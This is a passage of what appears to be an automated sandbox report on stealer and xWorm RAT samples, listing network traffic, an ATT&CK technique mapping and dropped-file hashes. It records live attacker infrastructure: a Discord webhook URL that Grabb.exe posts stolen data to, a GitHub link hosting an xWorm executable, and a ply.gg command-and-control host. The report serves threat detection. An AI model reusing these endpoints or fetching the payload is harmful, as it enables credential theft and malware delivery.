                                      X-Ttl: 60
                                      X-Rl: 44
                                    • flag-us
                                      DNS
                                      canary.discord.com
                                      Grabb.exe
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      canary.discord.com
                                      IN A
                                      Response
                                      canary.discord.com
                                      IN A
                                      162.159.137.232
                                      canary.discord.com
                                      IN A
                                      162.159.135.232
                                      canary.discord.com
                                      IN A
                                      162.159.128.233
                                      canary.discord.com
                                      IN A
                                      162.159.138.232
                                      canary.discord.com
                                      IN A
                                      162.159.136.232
                                    • flag-us
                                      POST
                                      https://canary.discord.com/api/webhooks/1279146469588340746/OZT0SJ0y5zhhi2z7H8eJ576F3-SmO2zrejY7aiS_DYX6c0ea5nuejVV4CjY8Hs9MDl_G
                                      Grabb.exe
                                      Remote address:
                                      162.159.137.232:443
                                      Request
                                      POST /api/webhooks/1279146469588340746/OZT0SJ0y5zhhi2z7H8eJ576F3-SmO2zrejY7aiS_DYX6c0ea5nuejVV4CjY8Hs9MDl_G HTTP/1.1
                                      Accept: application/json
                                      User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
                                      Content-Type: application/json; charset=utf-8
                                      Host: canary.discord.com
                                      Content-Length: 940
                                      Expect: 100-continue
                                      Connection: Keep-Alive
                                      Response
                                      HTTP/1.1 404 Not Found
                                      Date: Fri, 06 Sep 2024 15:01:13 GMT
                                      Content-Type: application/json
                                      Content-Length: 45
                                      Connection: keep-alive
                                      CF-Ray: 8bef55452bed7791-LHR
                                      CF-Cache-Status: DYNAMIC
                                      Set-Cookie: __dcfduid=dbda3c5e6c6011efaea38aa41e88672c; Expires=Wed, 05-Sep-2029 15:01:13 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Via: 1.1 google
                                      alt-svc: h3=":443"; ma=86400
                                      X-Content-Type-Options: nosniff
                                      x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                      x-ratelimit-limit: 5
                                      x-ratelimit-remaining: 4
                                      x-ratelimit-reset: 1725634874
                                      x-ratelimit-reset-after: 1
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iNiBDpP0WeicLS7CX7%2F0yIzPBXdmHpe4bZORLdjRgP6tz12fokvVPFhZQmBTxeTzBf%2FUWZUVep1JF%2BYNFPqZN%2FsPxHEqUHJnInnsuyszzHK9dt2q3QIczH1tPjMvjZTZ2y09xw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Content-Security-Policy: frame-ancestors 'none'; default-src https://o64374.ingest.sentry.io; report-to csp-sentry; report-uri https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870
                                      Reporting-Endpoints: csp-sentry=https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870
                                      Set-Cookie: __sdcfduid=dbda3c5e6c6011efaea38aa41e88672ca75d4c924fbf294c5df5638faeed2c52904ea2b50170733bf2c06cf51faec99c; Expires=Wed, 05-Sep-2029 15:01:13 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                      Set-Cookie: __cfruid=57c76d52f9d5e91bf7fac9befe75e9d35d51006e-1725634873; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                      Set-Cookie: _cfuvid=FBK5z0SQX_ShA7kJix9I8Au8.9rypa9aN7BVfLvHOdQ-1725634873351-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                    • flag-us
                                      POST
                                      https://canary.discord.com/api/webhooks/1279146469588340746/OZT0SJ0y5zhhi2z7H8eJ576F3-SmO2zrejY7aiS_DYX6c0ea5nuejVV4CjY8Hs9MDl_G
                                      Grabb.exe
                                      Remote address:
                                      162.159.137.232:443
                                      Request
                                      POST /api/webhooks/1279146469588340746/OZT0SJ0y5zhhi2z7H8eJ576F3-SmO2zrejY7aiS_DYX6c0ea5nuejVV4CjY8Hs9MDl_G HTTP/1.1
                                      Accept: application/json
                                      User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
                                      Content-Type: multipart/form-data; boundary="9bcd025f-60b2-491d-96e1-2085744242e8"
                                      Host: canary.discord.com
                                      Cookie: __dcfduid=dbda3c5e6c6011efaea38aa41e88672c; __sdcfduid=dbda3c5e6c6011efaea38aa41e88672ca75d4c924fbf294c5df5638faeed2c52904ea2b50170733bf2c06cf51faec99c; __cfruid=57c76d52f9d5e91bf7fac9befe75e9d35d51006e-1725634873; _cfuvid=FBK5z0SQX_ShA7kJix9I8Au8.9rypa9aN7BVfLvHOdQ-1725634873351-0.0.1.1-604800000
                                      Content-Length: 443282
                                      Expect: 100-continue
                                      Response
                                      HTTP/1.1 404 Not Found
                                      Date: Fri, 06 Sep 2024 15:01:13 GMT
                                      Content-Type: application/json
                                      Content-Length: 45
                                      Connection: keep-alive
                                      CF-Ray: 8bef5546ae297791-LHR
                                      CF-Cache-Status: DYNAMIC
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Via: 1.1 google
                                      alt-svc: h3=":443"; ma=86400
                                      X-Content-Type-Options: nosniff
                                      x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                      x-ratelimit-limit: 5
                                      x-ratelimit-remaining: 3
                                      x-ratelimit-reset: 1725634875
                                      x-ratelimit-reset-after: 1
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MWcyqT7jhOmqT%2FsGp2qPMcv1EMBoXsdW%2FcbHIZRWqM1LYLozAg%2FBXakOaNal2ViYD%2Fh%2F%2Fna5SFADXYf2rUT3iwIY3QtqRUYIfh8XOc51w8eaKmBN3RTv2rLEu6SMtBPVRvnzuw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Content-Security-Policy: frame-ancestors 'none'; default-src https://o64374.ingest.sentry.io; report-to csp-sentry; report-uri https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870
                                      Reporting-Endpoints: csp-sentry=https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870
                                      Server: cloudflare
                                    • flag-us
                                      DNS
                                      232.137.159.162.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      232.137.159.162.in-addr.arpa
                                      IN PTR
                                      Response
                                    • flag-us
                                      DNS
                                      japanese-longer.gl.at.ply.gg
                                      Cloner.exe
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      japanese-longer.gl.at.ply.gg
                                      IN A
                                      Response
                                      japanese-longer.gl.at.ply.gg
                                      IN A
                                      147.185.221.22
                                    • flag-us
                                      DNS
                                      22.221.185.147.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      22.221.185.147.in-addr.arpa
                                      IN PTR
                                      Response
                                    • flag-us
                                      DNS
                                      103.169.127.40.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      103.169.127.40.in-addr.arpa
                                      IN PTR
                                      Response
                                    • flag-us
                                      DNS
                                      18.31.95.13.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      18.31.95.13.in-addr.arpa
                                      IN PTR
                                      Response
                                    • flag-us
                                      DNS
                                      92.12.20.2.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      92.12.20.2.in-addr.arpa
                                      IN PTR
                                      Response
                                      92.12.20.2.in-addr.arpa
                                      IN PTR
                                      a2-20-12-92deploystaticakamaitechnologiescom
                                    • 20.26.156.215:443
                                      https://github.com/3z02/Dont-/raw/main/xWorm+v5.6.exe
                                      tls, http2
                                      msedge.exe
                                      1.9kB
                                       8.0kB
                                       17
                                      14

                                      HTTP Request

                                      GET https://github.com/3z02/Dont-/raw/main/xWorm+v5.6.exe

                                      HTTP Response

                                      302
                                    • 185.199.109.133:443
                                      https://raw.githubusercontent.com/3z02/Dont-/main/xWorm%2Bv5.6.exe
                                      tls, http2
                                      msedge.exe
                                      255.8kB
                                       13.0MB
                                       5311
                                      9320

                                      HTTP Request

                                      GET https://raw.githubusercontent.com/3z02/Dont-/main/xWorm%2Bv5.6.exe

                                      HTTP Response

                                      200
                                    • 142.250.102.94:443
                                      https://gstatic.com/generate_204
                                      tls, http
                                      Grabb.exe
                                      724 B
                                       4.9kB
                                       8
                                      8

                                      HTTP Request

                                      GET https://gstatic.com/generate_204

                                      HTTP Response

                                      204
                                    • 208.95.112.1:80
                                      http://ip-api.com/line/?fields=hosting
                                      http
                                      Grabb.exe
                                      310 B
                                       267 B
                                       5
                                      2

                                      HTTP Request

                                      GET http://ip-api.com/line/?fields=hosting

                                      HTTP Response

                                      200
                                    • 208.95.112.1:80
                                      http://ip-api.com/json/?fields=225545
                                      http
                                      Grabb.exe
                                      285 B
                                       510 B
                                       5
                                      4

                                      HTTP Request

                                      GET http://ip-api.com/json/?fields=225545

                                      HTTP Response

                                      200
                                    • 162.159.137.232:443
                                      https://canary.discord.com/api/webhooks/1279146469588340746/OZT0SJ0y5zhhi2z7H8eJ576F3-SmO2zrejY7aiS_DYX6c0ea5nuejVV4CjY8Hs9MDl_G
                                      tls, http
                                      Grabb.exe
                                      460.2kB
                                       12.4kB
                                       341
                                      156

                                      HTTP Request

                                      POST https://canary.discord.com/api/webhooks/1279146469588340746/OZT0SJ0y5zhhi2z7H8eJ576F3-SmO2zrejY7aiS_DYX6c0ea5nuejVV4CjY8Hs9MDl_G

                                      HTTP Response

                                      404

                                      HTTP Request

                                      POST https://canary.discord.com/api/webhooks/1279146469588340746/OZT0SJ0y5zhhi2z7H8eJ576F3-SmO2zrejY7aiS_DYX6c0ea5nuejVV4CjY8Hs9MDl_G

                                      HTTP Response

                                      404
                                    • 147.185.221.22:28461
                                      japanese-longer.gl.at.ply.gg
                                      Cloner.exe
                                      16.5kB
                                       669.6kB
                                       319
                                      527
                                    • 147.185.221.22:28461
                                      japanese-longer.gl.at.ply.gg
                                      Cloner.exe
                                      198.8kB
                                       3.9kB
                                       156
                                      77
                                    • 8.8.8.8:53
                                      8.8.8.8.in-addr.arpa
                                      dns
                                      66 B
                                       90 B
                                       1
                                      1

                                      DNS Request

                                      8.8.8.8.in-addr.arpa

                                    • 8.8.8.8:53
                                      217.106.137.52.in-addr.arpa
                                      dns
                                      73 B
                                       147 B
                                       1
                                      1

                                      DNS Request

                                      217.106.137.52.in-addr.arpa

                                    • 8.8.8.8:53
                                      github.com
                                      dns
                                      msedge.exe
                                      56 B
                                       72 B
                                       1
                                      1

                                      DNS Request

                                      github.com

                                      DNS Response

                                      20.26.156.215

                                    • 8.8.8.8:53
                                      raw.githubusercontent.com
                                      dns
                                      msedge.exe
                                      71 B
                                       135 B
                                       1
                                      1

                                      DNS Request

                                      raw.githubusercontent.com

                                      DNS Response

                                      185.199.109.133
                                      185.199.110.133
                                      185.199.111.133
                                      185.199.108.133

                                    • 8.8.8.8:53
                                      215.156.26.20.in-addr.arpa
                                      dns
                                      72 B
                                       158 B
                                       1
                                      1

                                      DNS Request

                                      215.156.26.20.in-addr.arpa

                                    • 8.8.8.8:53
                                      34.56.20.217.in-addr.arpa
                                      dns
                                      71 B
                                       131 B
                                       1
                                      1

                                      DNS Request

                                      34.56.20.217.in-addr.arpa

                                    • 8.8.8.8:53
                                      95.221.229.192.in-addr.arpa
                                      dns
                                      73 B
                                       144 B
                                       1
                                      1

                                      DNS Request

                                      95.221.229.192.in-addr.arpa

                                    • 8.8.8.8:53
                                      22.160.190.20.in-addr.arpa
                                      dns
                                      72 B
                                       158 B
                                       1
                                      1

                                      DNS Request

                                      22.160.190.20.in-addr.arpa

                                    • 224.0.0.251:5353
                                      398 B
                                       6
                                    • 8.8.8.8:53
                                      133.109.199.185.in-addr.arpa
                                      dns
                                      74 B
                                       118 B
                                       1
                                      1

                                      DNS Request

                                      133.109.199.185.in-addr.arpa

                                    • 8.8.8.8:53
                                      241.150.49.20.in-addr.arpa
                                      dns
                                      72 B
                                       158 B
                                       1
                                      1

                                      DNS Request

                                      241.150.49.20.in-addr.arpa

                                    • 8.8.8.8:53
                                      gstatic.com
                                      dns
                                      Grabb.exe
                                      57 B
                                       89 B
                                       1
                                      1

                                      DNS Request

                                      gstatic.com

                                      DNS Response

                                      142.250.102.94
                                      142.250.102.120

                                    • 8.8.8.8:53
                                      ip-api.com
                                      dns
                                      Grabb.exe
                                      56 B
                                       72 B
                                       1
                                      1

                                      DNS Request

                                      ip-api.com

                                      DNS Response

                                      208.95.112.1

                                    • 8.8.8.8:53
                                      94.102.250.142.in-addr.arpa
                                      dns
                                      73 B
                                       106 B
                                       1
                                      1

                                      DNS Request

                                      94.102.250.142.in-addr.arpa

                                    • 8.8.8.8:53
                                      1.112.95.208.in-addr.arpa
                                      dns
                                      71 B
                                       95 B
                                       1
                                      1

                                      DNS Request

                                      1.112.95.208.in-addr.arpa

                                    • 8.8.8.8:53
                                      canary.discord.com
                                      dns
                                      Grabb.exe
                                      64 B
                                       144 B
                                       1
                                      1

                                      DNS Request

                                      canary.discord.com

                                      DNS Response

                                      162.159.137.232
                                      162.159.135.232
                                      162.159.128.233
                                      162.159.138.232
                                      162.159.136.232

                                    • 8.8.8.8:53
                                      232.137.159.162.in-addr.arpa
                                      dns
                                      74 B
                                       136 B
                                       1
                                      1

                                      DNS Request

                                      232.137.159.162.in-addr.arpa

                                    • 8.8.8.8:53
                                      japanese-longer.gl.at.ply.gg
                                      dns
                                      Cloner.exe
                                      74 B
                                       90 B
                                       1
                                      1

                                      DNS Request

                                      japanese-longer.gl.at.ply.gg

                                      DNS Response

                                      147.185.221.22

                                    • 8.8.8.8:53
                                      22.221.185.147.in-addr.arpa
                                      dns
                                      73 B
                                       130 B
                                       1
                                      1

                                      DNS Request

                                      22.221.185.147.in-addr.arpa

                                    • 8.8.8.8:53
                                      103.169.127.40.in-addr.arpa
                                      dns
                                      73 B
                                       147 B
                                       1
                                      1

                                      DNS Request

                                      103.169.127.40.in-addr.arpa

                                    • 8.8.8.8:53
                                      18.31.95.13.in-addr.arpa
                                      dns
                                      70 B
                                       144 B
                                       1
                                      1

                                      DNS Request

                                      18.31.95.13.in-addr.arpa

                                    • 8.8.8.8:53
                                      92.12.20.2.in-addr.arpa
                                      dns
                                      69 B
                                       131 B
                                       1
                                      1

                                      DNS Request

                                      92.12.20.2.in-addr.arpa

                                    MITRE ATT&CK Enterprise v15

                                    Reconnaissance

                                    Resource Development

                                    Initial Access

                                    Execution

                                    Command and Scripting Interpreter

                                    1
                                    T1059

                                    PowerShell

                                    1
                                    T1059.001

                                    Scheduled Task/Job

                                    1
                                    T1053

                                    Scheduled Task

                                    1
                                    T1053.005

                                    Persistence

                                    Boot or Logon Autostart Execution

                                    1
                                    T1547

                                    Registry Run Keys / Startup Folder

                                    1
                                    T1547.001

                                    Scheduled Task/Job

                                    1
                                    T1053

                                    Scheduled Task

                                    1
                                    T1053.005

                                    Privilege Escalation

                                    Boot or Logon Autostart Execution

                                    1
                                    T1547

                                    Registry Run Keys / Startup Folder

                                    1
                                    T1547.001

                                    Scheduled Task/Job

                                    1
                                    T1053

                                    Scheduled Task

                                    1
                                    T1053.005

                                    Defense Evasion

                                    Hide Artifacts

                                    1
                                    T1564

                                    Hidden Files and Directories

                                    1
                                    T1564.001

                                    Modify Registry

                                    1
                                    T1112

                                    Credential Access

                                    Credentials from Password Stores

                                    1
                                    T1555

                                    Credentials from Web Browsers

                                    1
                                    T1555.003

                                    Unsecured Credentials

                                    1
                                    T1552

                                    Credentials In Files

                                    1
                                    T1552.001

                                    Discovery

                                    Browser Information Discovery

                                    1
                                    T1217

                                    Peripheral Device Discovery

                                    1
                                    T1120

                                    Query Registry

                                    4
                                    T1012

                                    Remote System Discovery

                                    1
                                    T1018

                                    System Information Discovery

                                    5
                                    T1082

                                    System Network Configuration Discovery

                                    1
                                    T1016

                                    Internet Connection Discovery

                                    1
                                    T1016.001

                                    Lateral Movement

                                    Collection

                                    Data from Local System

                                    1
                                    T1005

                                    Command and Control

                                    Web Service

                                    1
                                    T1102

                                    Exfiltration

                                    Impact

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads

                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                      Filesize

                                      2KB

                                      MD5

                                      d85ba6ff808d9e5444a4b369f5bc2730

                                      SHA1

                                      31aa9d96590fff6981b315e0b391b575e4c0804a

                                      SHA256

                                      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                      SHA512

                                      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                      Filesize

                                      152B

                                      MD5

                                      d7114a6cd851f9bf56cf771c37d664a2

                                      SHA1

                                      769c5d04fd83e583f15ab1ef659de8f883ecab8a

                                      SHA256

                                      d2c75c7d68c474d4b8847b4ba6cfd09fe90717f46dd398c86483d825a66e977e

                                      SHA512

                                      33bdae2305ae98e7c0de576de5a6600bd70a425e7b891d745cba9de992036df1b3d1df9572edb0f89f320e50962d06532dae9491985b6b57fd37d5f46f7a2ff8

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                      Filesize

                                      152B

                                      MD5

                                      719923124ee00fb57378e0ebcbe894f7

                                      SHA1

                                      cc356a7d27b8b27dc33f21bd4990f286ee13a9f9

                                      SHA256

                                      aa22ab845fa08c786bd3366ec39f733d5be80e9ac933ed115ff048ff30090808

                                      SHA512

                                      a207b6646500d0d504cf70ee10f57948e58dab7f214ad2e7c4af0e7ca23ce1d37c8c745873137e6c55bdcf0f527031a66d9cc54805a0eac3678be6dd497a5bbc

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
                                      Filesize

                                      261B

                                      MD5

                                      2c2e6472d05e3832905f0ad4a04d21c3

                                      SHA1

                                      007edbf35759af62a5b847ab09055e7d9b86ffcc

                                      SHA256

                                      283d954fa21caa1f3b4aba941b154fab3e626ff27e7b8029f5357872c48cbe03

                                      SHA512

                                      8c4ce1ea02da6ffb7e7041c50528da447d087d9ee3c9f4a8c525d2d856cf48e46f5dd9a1fedd23dd047634e719c8886457f7e7240aa3cc36f1a6216e4c00ee37

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                      Filesize

                                      5KB

                                      MD5

                                      1f634ef83ec1de89e5a03adea99f280a

                                      SHA1

                                      0b2544cde4e75f436ae7b4806bb29e7a33a3723a

                                      SHA256

                                      82852f0d4b7476666b34450b794b723ce841c4f51603e8460813313985b84c01

                                      SHA512

                                      201b064928e35516eed1baed8749a8d8c33b2e92cf9b6e1e5074cdad553ad556b5e586c938176024dc8b97eaec7aa11f6ae153ca6eb171a7d7dc593ad35f40b8

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                      Filesize

                                      6KB

                                      MD5

                                      e791b3c834276f40cc2572d73b1794bd

                                      SHA1

                                      5b570fad2914b0ad87fe1bb3a1d2653f9fa8379f

                                      SHA256

                                      40492befc227751b40b59552cf000168acc9f65b1bdd1edcc6eceb0d6d35f059

                                      SHA512

                                      12c16ff510b4bf67e9debfc6ef31d31b0c9538982b62084a24c4bc0580fbc7b61fdf3c469547fdccff3db0a0f563a9153503f8883bacbe2472042d4ae27e16f7

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                      Filesize

                                      6KB

                                      MD5

                                      6c26049d9c7c47b4bf02763769bb7675

                                      SHA1

                                      835d940c47b260e36c7aa7d20aad4a5f5a5bdb8a

                                      SHA256

                                      ae979ceb533c53b21f3d5f6c77cacbfdea783fa1eee18fe5d6cfabb121c1734b

                                      SHA512

                                      0bb1ebcbd6ff7b7079886fd38cdaa482860ec85fd4dc40cdd1efede68a9feb4177a27c93c6124dc4b1de9c23ba9d63c9d23ae1e2a7d82ede97bb3ca7065f9bba

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
                                      Filesize

                                      16B

                                      MD5

                                      46295cac801e5d4857d09837238a6394

                                      SHA1

                                      44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                      SHA256

                                      0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                      SHA512

                                      8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
                                      Filesize

                                      16B

                                      MD5

                                      206702161f94c5cd39fadd03f4014d98

                                      SHA1

                                      bd8bfc144fb5326d21bd1531523d9fb50e1b600a

                                      SHA256

                                      1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

                                      SHA512

                                      0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                      Filesize

                                      10KB

                                      MD5

                                      176a57260cec82c85b681484d3cce36f

                                      SHA1

                                      43107c71a3c343e424c7f3cdbf61d03647c29db5

                                      SHA256

                                      e0dc5f130c877c65354cf86946a6a1c524f7e2fdfc88084410dcf686c7833fef

                                      SHA512

                                      6c2dd386b5753b94a15277e1c644a5950967f10841e1657ee26284fc6864d2eec9b817b7cda8e34b3727fce9ec31412686cdabae47419f3cb6f0d7fe1d292893

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                      Filesize

                                      10KB

                                      MD5

                                      feea017317645635291d23e72bff944b

                                      SHA1

                                      e4ef1e2e6b29162b8417b9a3224fe84fc087fa8b

                                      SHA256

                                      edf5ead25f12aff387f5cb458b0355b8429fcefb7438a4da3a01e875405f6f85

                                      SHA512

                                      a5f0668e4c74989ab1c3cd2b06bcd44a9e9f7d17a88942786212baac30076724440796ce1ce55fe0143185e7f0f011a9e95cb5132bcc34f83f788ff56bb79380

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                      Filesize

                                      944B

                                      MD5

                                      2979eabc783eaca50de7be23dd4eafcf

                                      SHA1

                                      d709ce5f3a06b7958a67e20870bfd95b83cad2ea

                                      SHA256

                                      006cca90e78fbb571532a83082ac6712721a34ea4b21f490058ffb3f521f4903

                                      SHA512

                                      92bc433990572d9427d0c93eef9bd1cc23fa00ed60dd0c9c983d87d3421e02ce3f156c6f88fe916ef6782dbf185cbce083bc0094f8c527f302be6a37d1c53aba

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                      Filesize

                                      948B

                                      MD5

                                      74a6b79d36b4aae8b027a218bc6e1af7

                                      SHA1

                                      0350e46c1df6934903c4820a00b0bc4721779e5f

                                      SHA256

                                      60c64f6803d7ad1408d0a8628100470859b16ef332d5f1bd8bb2debe51251d04

                                      SHA512

                                      60e71435a9a23f4c144d641844f4182ddc9aa4ccd3e99232149a187112dce96458aab9587e9fea46f5dc5a52f5ca758969a04657a2b5b10241d3e4554f7c85e0

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                      Filesize

                                      1KB

                                      MD5

                                      548dd08570d121a65e82abb7171cae1c

                                      SHA1

                                      1a1b5084b3a78f3acd0d811cc79dbcac121217ab

                                      SHA256

                                      cdf17b8532ebcebac3cfe23954a30aa32edd268d040da79c82687e4ccb044adc

                                      SHA512

                                      37b98b09178b51eec9599af90d027d2f1028202efc1633047e16e41f1a95610984af5620baac07db085ccfcb96942aafffad17aa1f44f63233e83869dc9f697b

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                      Filesize

                                      1KB

                                      MD5

                                      f5925d3b5a24b7220c7b6ce426c1f639

                                      SHA1

                                      de19fe06c3bf1bc6e0df2e157594e7ba4d3ac27a

                                      SHA256

                                      8b247301f487ebafc209b5f962570870ca78080f4cf3177476ad7694f8ba42d7

                                      SHA512

                                      b252965dde16530c92347c389ef0b59b45ee39c3dd494930d51c019f3ac1891fd49eb5b84b4d2647a6e597f369d6a8f4913fba7f39d4eebc4fa575dcff2dbe38

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                      Filesize

                                      944B

                                      MD5

                                      019a54d1f0d6469396d1d79bcca4d41d

                                      SHA1

                                      f7998bbb060a580079940ddc583dfaf798867fa7

                                      SHA256

                                      8dc87996c13c37f8c745ae8c49d477ff1b5e578845ed76f0bab90b157e42040a

                                      SHA512

                                      e3484f695ac2ebfc0430264e63e49a34f9617ac10112929112031baa6c74f1f406ea5e150fd1eb44ab9e0a8470e1bc7c9d416c93357dda9986a80038f26b21d3

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                      Filesize

                                      944B

                                      MD5

                                      04f1d68afbed6b13399edfae1e9b1472

                                      SHA1

                                      8bfdcb687a995e4a63a8c32df2c66dc89f91a8b0

                                      SHA256

                                      f358f33a42122e97c489fad7bbc8beab2eb42d42e4ec7fce0dd61fe6d8c0b8de

                                      SHA512

                                      30c5e72a8134992094d937d2588f7a503b1d6407d11afe0265b7c8b0ce14071925e5caed13fc4f9c28705df4c7aed3601f81b007048b148af274d7784aa5fb75

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                      Filesize

                                      944B

                                      MD5

                                      ba169f4dcbbf147fe78ef0061a95e83b

                                      SHA1

                                      92a571a6eef49fff666e0f62a3545bcd1cdcda67

                                      SHA256

                                      5ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1

                                      SHA512

                                      8d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                      Filesize

                                      944B

                                      MD5

                                      98baf5117c4fcec1692067d200c58ab3

                                      SHA1

                                      5b33a57b72141e7508b615e17fb621612cb8e390

                                      SHA256

                                      30bf8496e9a08f4fdfe4767abcd565f92b6da06ca1c7823a70cb7cab16262e51

                                      SHA512

                                      344a70bfc037d54176f12db91f05bf4295bb587a5062fd1febe6f52853571170bd8ef6042cb87b893185bbae1937cf77b679d7970f8cc1c2666b0b7c1b32987d

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Temp\Cloner.exe
                                      Filesize

                                      204KB

                                      MD5

                                      5f43c0499a7d7947f5feb5db1a8726f0

                                      SHA1

                                      3eb4045f1287531843d11e52423472b54494b02b

                                      SHA256

                                      2824d0b186c90e04ab56e026c018e7f521e2127bd526d9fca008eaa613fe4012

                                      SHA512

                                      c7aaee50c4c13b711a46511611c27eb2d6bd92ef26b0b7627f63f34ee45d1386cad819accfd267e89574eea21a5f752706878824f4996b9a7faa4d742789752a

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Temp\Grabb.exe
                                      Filesize

                                      231KB

                                      MD5

                                      aa72c54d54f7dcef7482efd77fffe5eb

                                      SHA1

                                      76689cf7194fbf0f0deb4ec2e1d29cdddbceecf0

                                      SHA256

                                      bd9152eb61004161c21b7b2af7873a07dddb6e2fb5966b021825ebaf9b7ff9b0

                                      SHA512

                                      3e1e8c6869d5447fe6c154a095981f3fc1d8638154c22b29c6bf68e4269161431b392d143f7c866c7ea7a828c0a225bf6e341465c9e9e6a96e7a5072bc1c91ff

                                      Download Submit

                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jabi5mti.ykw.ps1
                                      Filesize

                                      60B

                                      MD5

                                      d17fe0a3f47be24a6453e9ef58c94641

                                      SHA1

                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                      SHA256

                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                      SHA512

                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                      Download Submit

                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk
                                      Filesize

                                      771B

                                      MD5

                                      97a1382ac6d913bba8f28d893061f6bb

                                      SHA1

                                      c6c682b05f8fb99197b5c81766f13dc0dd37dc80

                                      SHA256

                                      9bfec377124051f0a24394eefee72cacf80434eab2aef36569e4eb75eb369c14

                                      SHA512

